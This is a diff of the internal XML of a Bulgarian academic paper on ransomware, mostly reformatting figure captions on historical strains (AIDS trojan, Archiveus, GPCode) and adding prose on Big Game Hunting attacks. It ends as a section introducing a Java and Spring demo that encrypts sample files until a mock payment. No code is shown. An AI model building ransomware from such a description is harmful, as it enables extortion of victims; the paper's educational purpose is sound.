+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>1</w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>(</w:t>
+        </w:rPr>
+        <w:t>С</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>Фиг</w:t>
+        <w:t xml:space="preserve">ъобщението за откуп на </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>.</w:t>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>AIDS trojan</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>1</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> – съобщението за откуп на </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>AIDS trojan</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="left"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="4"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -2799,7 +3338,7 @@
           <w:numId w:val="2"/>
         </w:numPr>
       </w:pPr>
-      <w:bookmarkStart w:id="4" w:name="_Toc223361341"/>
+      <w:bookmarkStart w:id="5" w:name="_Toc223385509"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -2819,7 +3358,7 @@
       <w:r>
         <w:t xml:space="preserve"> криптиране</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="4"/>
+      <w:bookmarkEnd w:id="5"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2893,6 +3432,7 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:keepNext/>
         <w:spacing w:line="360" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
@@ -2951,63 +3491,95 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="6" w:name="_Toc223382608"/>
+      <w:r>
+        <w:t xml:space="preserve">Фигура </w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>А</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">рхитектура на </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>RSA</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> криптиране</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="6"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:jc w:val="left"/>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>(Фиг</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>2</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> – архитектура на </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>RSA</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> криптиране)</w:t>
-      </w:r>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3198,6 +3770,7 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:keepNext/>
         <w:spacing w:line="360" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
@@ -3257,86 +3830,65 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:jc w:val="left"/>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">(Фиг. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
+        <w:pStyle w:val="Caption"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="7" w:name="_Toc223382609"/>
+      <w:r>
+        <w:t xml:space="preserve">Фигура </w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
         </w:rPr>
         <w:t>3</w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> – </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>И</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">зглед на </w:t>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Изглед на </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
         <w:t>Archiveus</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Trojan</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Trojan</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
         <w:t xml:space="preserve"> вирус</w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>.</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>)</w:t>
-      </w:r>
+      <w:bookmarkEnd w:id="7"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3359,7 +3911,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="5" w:name="_Toc223361342"/>
+      <w:bookmarkStart w:id="8" w:name="_Toc223385510"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -3367,7 +3919,7 @@
         <w:lastRenderedPageBreak/>
         <w:t>Spear phishing Ransomware</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="5"/>
+      <w:bookmarkEnd w:id="8"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3672,6 +4224,7 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:keepNext/>
         <w:ind w:firstLine="360"/>
         <w:jc w:val="center"/>
       </w:pPr>
@@ -3731,6 +4284,49 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="9" w:name="_Toc223382610"/>
+      <w:r>
+        <w:t xml:space="preserve">Фигура </w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>4</w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Пробита система от </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>GPCode</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="9"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:jc w:val="left"/>
         <w:rPr>
           <w:sz w:val="20"/>
@@ -3743,100 +4339,19 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>(Фиг</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>4</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> – </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>П</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>робита система от</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>GPCode</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepNext/>
         <w:ind w:firstLine="360"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57C5B3CC" wp14:editId="19ACAFDC">
             <wp:extent cx="5760720" cy="3472815"/>
@@ -3889,72 +4404,45 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:ind w:firstLine="360"/>
-        <w:jc w:val="left"/>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">(Фиг. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
+        <w:pStyle w:val="Caption"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="10" w:name="_Toc223382611"/>
+      <w:r>
+        <w:t xml:space="preserve">Фигура </w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
         </w:rPr>
         <w:t>5</w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> – </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>И</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">нструкции за откуп, </w:t>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Инструкции за откуп, </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
         <w:t>GPCode</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
         <w:t>.</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>)</w:t>
-      </w:r>
+      <w:bookmarkEnd w:id="10"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3975,7 +4463,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="6" w:name="_Toc223361343"/>
+      <w:bookmarkStart w:id="11" w:name="_Toc223385511"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -3995,7 +4483,7 @@
       <w:r>
         <w:t>базирани системи</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="6"/>
+      <w:bookmarkEnd w:id="11"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4068,10 +4556,8 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:keepNext/>
         <w:jc w:val="center"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -4129,19 +4615,41 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Caption"/>
         <w:jc w:val="left"/>
         <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>(Фиг. 6 – Троянски код маскиран като софтуерен ъпдейт.)</w:t>
-      </w:r>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="12" w:name="_Toc223382612"/>
+      <w:r>
+        <w:t xml:space="preserve">Фигура </w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>6</w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Троянски код маскиран като софтуерен ъпдейт.</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="12"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4167,7 +4675,7 @@
           <w:numId w:val="2"/>
         </w:numPr>
       </w:pPr>
-      <w:bookmarkStart w:id="7" w:name="_Toc223361344"/>
+      <w:bookmarkStart w:id="13" w:name="_Toc223385512"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -4184,7 +4692,7 @@
         </w:rPr>
         <w:t>Ransomware</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="7"/>
+      <w:bookmarkEnd w:id="13"/>
     </w:p>
     <w:p>
       <w:r>
@@ -4243,200 +4751,2555 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Caption"/>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
+      <w:bookmarkStart w:id="14" w:name="_Toc223382613"/>
+      <w:r>
+        <w:t xml:space="preserve">Фигура </w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>7</w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Модел на заплахите в Big </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Game</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Hunting</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="14"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="708"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">За да оптимизират атаките си, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ransomware</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> операторите променят стратегията си. Те се отказват от метода „</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>spray</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>and</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>pray</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>“, при който зловредният софтуер се разпространява масово, без конкретен избор на жертва. Вместо това започват да таргетират конкретни организации и потребители</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, или известно още като</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Big Game Hunting.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Идеята е проста, вместо да се надяват някой да се хване и да получат малко сума откуп – стандартно са искали по 300</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> USD</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, компанията изложи на подобна атака стават жертва на откупи в суми достигащи десетки хиляди.  </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Такива жертви са </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>River Beach</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> и </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>TravelEx</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>, заплатили съответно 600 000</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> USD</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> и </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">2.3 </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">млн. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>USD</w:t>
+      </w:r>
+      <w:r>
+        <w:t>. В двата примера атаката е една и също, изтегляне на неверифицирани файлове през</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> phishing</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> имейл.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="708"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">На фигура 7 е показан модела на атаката в </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">BGH. </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Започва през едно инфектирано устройство и се разпространява към всички възможни системи в мрежата. Процесът се повтаря, докато се заразяват възможно най-много системи. После се </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>деплойва</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ransomware-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ът</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> и се изисква откуп в биткойни.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="15" w:name="_Toc223385513"/>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Имплементация на </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Ransomware</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="15"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">За имплементацията на </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ransomware</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> е използвана </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Java 21</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> и </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Spring Framework.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Целта на имплементацията е да се покаже колко лесно може да се създаде софтуер за криптиране и декриптиране на файлове, който да се използва за </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ransomware.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> В демото има три текстови файла, които съдържат кратко текстово съдържанието. При стартиран на приложението се криптират, когато потребителят „плати“, тогава се декриптират обратно в текстови.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
